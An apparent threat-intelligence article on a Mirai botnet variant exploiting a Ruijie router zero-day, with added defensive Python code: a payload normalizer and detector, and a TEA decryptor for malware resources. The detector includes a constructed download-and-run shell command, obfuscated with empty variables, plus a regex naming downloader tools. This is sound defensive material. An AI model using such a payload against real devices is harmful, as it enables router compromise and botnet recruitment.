Mirai_ptea_Rimasuta, an old and unpopular variant of Mirai, has surfaced again, abusing a zero-day vulnerability in RUIJIE router devices.

What has happened?

The botnet was first spotted in June as Mirai_ptea, abusing an unknown vulnerability in KGUARD DVRs. At the time, it did not seem like a big deal to researchers.
  • The recently exploited vulnerability in Ruijie routers is a command injection flaw in the Ruijie NBR700 series routers.
  • According to the research, a large number of internet-facing devices are exposed to this vulnerability.
  • Some of these identified device versions include NBR1600GDX9, RGNBR700GDX5, and more.

How does it work?

  • During exploitation, the payload contains a URL and several empty shell variables, probably inserted to mislead security teams. Once these variables are removed, the payload resolves to a command that downloads and runs the malware sample.
  • The actors behind Mirai_ptea_Rimasuta have redesigned its encryption scheme and C2 communication protocol: it uses the TEA algorithm and also encrypts other sensitive resource information, such as the Tor proxy.
  • Its communication proceeds in three steps: it first establishes a connection with the proxy node, then with the Tor C2, and finally communicates with the C2 via ptea's custom protocol to receive commands.
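The empty-variable trick described above matters mostly for detection: a signature written against the clean command will not fire on the raw payload, so the captured string should be normalized first. The following is an added example (not code from the original report or from the malware) of a defender-side normalizer that expands shell variable references, dropping any that are unset or empty, and then applies a simple download-and-execute signature. The sample payload, the variable names, and the URL are constructed for this example; the real payload is not on the page.

```python
import re

# Matches ${name} or $name references in a captured shell command.
VAR_REF = re.compile(r"\$\{([A-Za-z_][A-Za-z0-9_]*)\}|\$([A-Za-z_][A-Za-z0-9_]*)")

# Heuristic: a downloader (wget/curl/tftp) fetching an http(s) URL, followed in a
# later command of the same line by an interpreter or chmod.
DOWNLOAD_AND_RUN = re.compile(
    r"\b(?:wget|curl|tftp)\b[^;|&]*https?://[^\s;|&]+.*?[;|&]\s*(?:sh|bash|chmod)\b"
)


def normalize_command(cmd, env=None):
    """Expand variable references using `env`; unknown or empty variables vanish.

    This is the defender's view of the payload: the variables that the attacker
    left empty contribute nothing, so the command collapses to its real form.
    """
    env = env or {}

    def expand(match):
        name = match.group(1) or match.group(2)
        return env.get(name, "")

    expanded = VAR_REF.sub(expand, cmd)
    return re.sub(r"\s+", " ", expanded).strip()


def looks_like_download_and_run(cmd, env=None):
    """Return True if the normalized command matches the download-and-run pattern."""
    return DOWNLOAD_AND_RUN.search(normalize_command(cmd, env)) is not None


# Constructed sample: the command name is split by empty variables, so a naive
# signature for "wget" would miss the raw string. The URL is a documentation address.
SAMPLE_PAYLOAD = "${A}wg${B}et http://198.51.100.7/x.sh -O /tmp/x.sh; ${C}sh /tmp/x.sh"


if __name__ == "__main__":
    print("raw       :", SAMPLE_PAYLOAD)
    print("normalized:", normalize_command(SAMPLE_PAYLOAD))
    print("flagged   :", looks_like_download_and_run(SAMPLE_PAYLOAD))
```

Note that the signature is applied to the normalized string only; matching the raw string with `\bwget\b` would fail on the sample because the token is split. Passing a populated `env` lets the same normalizer handle payloads whose variables are not empty.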

Digging deeper

In their detailed analysis, researchers have divided the findings into multiple stages and components to make them easier to understand.
  • TEA key: The Mirai_ptea_Rimasuta sample comes with two sets of Tiny Encryption Algorithm (TEA) keys: one for encrypting and decrypting sensitive resources, the other for encrypting and decrypting network traffic.
  • Sandbox detection: The variant checks for the presence of a large number of sandboxes or simulators, and proceeds with infection only when its path and filename-related requirements are met.
  • C2 variation: Mirai_ptea_Rimasuta uses some specific code to reach the Tor C2, which reveals that there are around six C2s used by this malware.
  • Network protocol change: It encrypts the network traffic and carries a hard-coded set of keys, Net_teakey; the traffic key is created dynamically by negotiating with the C2s.
  • Information gathering function: It monitors the TCP network connections of the infected device and uploads the connection information that meets certain requirements to the Reporter.
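Both the "TEA key" item above and the encryption redesign mentioned earlier come down to the same building block: a 64-bit block cipher with a 128-bit key, applied with one key to embedded resource strings and with another to traffic. The following is an added example, written for this page and not taken from the malware or from the researchers' tooling, of how an analyst's TEA decryptor for such resources can be built. The two key values, the resource strings, the little-endian word order, and the zero-padded ECB handling of multi-block data are all assumptions made for the example; the actual keys, byte order and padding of the sample are not stated on the page.

```python
import struct

DELTA = 0x9E3779B9   # TEA round constant (derived from the golden ratio)
MASK32 = 0xFFFFFFFF
ROUNDS = 32          # standard TEA uses 32 cycles (64 Feistel rounds)


def tea_encrypt_block(v0, v1, k):
    """Encrypt one 64-bit block given as two uint32 words with key k (four uint32)."""
    s = 0
    for _ in range(ROUNDS):
        s = (s + DELTA) & MASK32
        v0 = (v0 + (((v1 << 4) + k[0]) ^ (v1 + s) ^ ((v1 >> 5) + k[1]))) & MASK32
        v1 = (v1 + (((v0 << 4) + k[2]) ^ (v0 + s) ^ ((v0 >> 5) + k[3]))) & MASK32
    return v0, v1


def tea_decrypt_block(v0, v1, k):
    """Inverse of tea_encrypt_block: run the rounds backwards with the sum counting down."""
    s = (DELTA * ROUNDS) & MASK32
    for _ in range(ROUNDS):
        v1 = (v1 - (((v0 << 4) + k[2]) ^ (v0 + s) ^ ((v0 >> 5) + k[3]))) & MASK32
        v0 = (v0 - (((v1 << 4) + k[0]) ^ (v1 + s) ^ ((v1 >> 5) + k[1]))) & MASK32
        s = (s - DELTA) & MASK32
    return v0, v1


def key_words(key):
    """Split a 16-byte key into four little-endian uint32 words (byte order is an assumption)."""
    if len(key) != 16:
        raise ValueError("TEA key must be 16 bytes")
    return struct.unpack("<4I", key)


def tea_encrypt(data, key):
    """ECB-encrypt a byte string, zero-padding it to a multiple of 8 bytes."""
    k = key_words(key)
    data = data + b"\x00" * ((-len(data)) % 8)
    out = bytearray()
    for i in range(0, len(data), 8):
        v0, v1 = struct.unpack_from("<2I", data, i)
        out += struct.pack("<2I", *tea_encrypt_block(v0, v1, k))
    return bytes(out)


def tea_decrypt(data, key):
    """ECB-decrypt a byte string and strip the zero padding added by tea_encrypt."""
    if len(data) % 8:
        raise ValueError("ciphertext length must be a multiple of 8")
    k = key_words(key)
    out = bytearray()
    for i in range(0, len(data), 8):
        v0, v1 = struct.unpack_from("<2I", data, i)
        out += struct.pack("<2I", *tea_decrypt_block(v0, v1, k))
    return bytes(out).rstrip(b"\x00")


# Two constructed key sets, standing in for the resource key and the network key
# the report describes. Real samples would have these recovered from the binary.
RESOURCE_KEY = bytes(range(16))
NET_KEY = bytes(range(16, 32))


def decrypt_resources(blobs, key):
    """Decrypt a list of encrypted resource blobs to strings, the analyst's usual first step."""
    return [tea_decrypt(blob, key).decode("latin-1") for blob in blobs]


if __name__ == "__main__":
    # Constructed resource strings; the sample's real strings are not on the page.
    plaintexts = [b"/bin/busybox", b"placeholder-proxy.onion"]
    blobs = [tea_encrypt(p, RESOURCE_KEY) for p in plaintexts]
    print("with resource key:", decrypt_resources(blobs, RESOURCE_KEY))
    # Using the traffic key on resource data yields garbage, which is the point of
    # keeping two key sets: recovering one does not unlock the other.
    print("with network key :", [tea_decrypt(b, NET_KEY) for b in blobs])
```

When adapting this to a real sample, the word order (`<` vs `>` in the `struct` formats), the round count, and any deviation from textbook TEA are the things to confirm in the disassembly before trusting the output, since custom variants of the cipher are common in this malware family.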

Conclusion

The new zero-day attack capability of Mirai_ptea_Rimasuta indicates that the operators of this malware may have bigger plans for the future. Users of Ruijie routers are advised to check for and apply firmware updates regularly and to use a strong password for the management interface.

Cyware Publisher